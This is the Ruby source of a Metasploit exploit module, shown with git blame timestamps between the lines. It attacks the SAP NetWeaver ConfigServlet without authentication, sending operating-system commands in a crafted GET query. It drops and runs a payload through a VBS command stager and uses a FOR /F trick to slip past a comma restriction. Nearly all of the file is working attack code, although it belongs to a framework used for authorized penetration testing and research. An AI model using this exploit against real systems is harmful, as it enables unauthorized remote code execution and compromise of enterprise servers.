metasploit-framework/modules/exploits/windows/http/sap_configservlet_exec_noau...

141 lines
4.6 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit
2013-08-30 21:28:54 +00:00
Rank = GreatRanking
2013-04-25 05:07:35 +00:00
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
2014-02-08 00:46:19 +00:00
include Msf::Exploit::CmdStager
2013-08-30 21:28:54 +00:00
include Msf::Exploit::FileDropper
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP ConfigServlet Remote Code Execution',
'Description' => %q{
This module allows remote code execution via operating system commands through the
SAP ConfigServlet without any authentication. This module has been tested successfully
with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.
},
'Author' =>
[
'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)
'Andras Kabai' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '92704'],
2013-08-30 21:28:54 +00:00
[ 'EDB', '24996'],
[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf']
],
'DisclosureDate' => 'Nov 01 2012', # Based on the reference presentation
'Platform' => 'win',
'Targets' =>
[
[
'Windows generic',
{
'Arch' => ARCH_X86
}
]
],
'CmdStagerFlavor' => 'vbs',
2013-08-30 21:28:54 +00:00
'DefaultTarget' => 0,
'Privileged' => false
))
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(50000),
OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])
], self.class)
2013-08-30 21:28:54 +00:00
register_advanced_options(
[
OptBool.new('DELETE_FILES', [ true, 'Delete the dropped files after exploitation', true ])
], self.class)
end
2013-08-30 21:28:54 +00:00
def check
uri = normalize_uri(target_uri.path, 'ConfigServlet')
begin
res = send_evil_request(uri, "whoami", 20)
rescue
vprint_error("An error has occured while sending the malicious request")
return Exploit::CheckCode::Unknown
2013-08-30 21:28:54 +00:00
end
if !res
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
2013-08-30 21:28:54 +00:00
elsif res.body.include?("Process created")
return Exploit::CheckCode::Vulnerable
2013-08-30 21:28:54 +00:00
else
return Exploit::CheckCode::Safe
2013-08-30 21:28:54 +00:00
end
end
2013-04-25 05:47:30 +00:00
2013-08-30 21:28:54 +00:00
def exploit
print_status("#{rhost}:#{rport} - Exploiting remote system")
uri = normalize_uri(target_uri.path, 'ConfigServlet')
2013-08-30 21:28:54 +00:00
execute_cmdstager( { :linemax => 1500, :nodelete => !datastore['DELETE_FILES'], :sap_configservlet_uri => uri })
end
2013-08-30 21:28:54 +00:00
def execute_command(cmd, opts)
commands = cmd.split(/&/)
commands.each do |command|
timeout = 20
if datastore['DELETE_FILES'] and command =~ /shell\.run \"(.*)\"/
register_file_for_cleanup($1)
end
if command.include?(".vbs") and command.include?(",")
# because the comma is bad character and the VBS stager contains commas it is necessary to "create" commas without directly using them
# using the following command line trick it is possible to echo commas into the right places
command.gsub!(",", "%i")
command = "cmd /c FOR /F \"usebackq tokens=2 delims=)\" %i IN (\`\"ping -n 1 127.0.0.1| findstr )\"\`) DO " + command
else
command = "cmd /c " + command
end
if command.include?("cscript")
# in case of bigger payloads the VBS stager could run for longer time as it needs to decode lot of data
# increaste timeout value when the VBS stager is called
timeout = 120
end
vprint_status("Attempting to execute: #{command}")
send_evil_request(opts[:sap_configservlet_uri], command, timeout)
end
end
2013-08-30 21:28:54 +00:00
def send_evil_request(uri, cmd, timeout)
begin
res = send_request_cgi(
{
'uri' => uri,
'method' => 'GET',
'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(cmd)
}, timeout)
2013-08-30 21:28:54 +00:00
if !res
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Exploit failed.")
end
2013-04-24 15:59:11 +00:00
2013-08-30 21:28:54 +00:00
if res.code != 200
vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Exploit failed.")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the server.")
end
2013-08-30 21:28:54 +00:00
if not res.body.include?("Process created")
vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
fail_with(Failure::PayloadFailed, "#{rhost}:#{rport} - Exploit failed.")
end
return res
end
end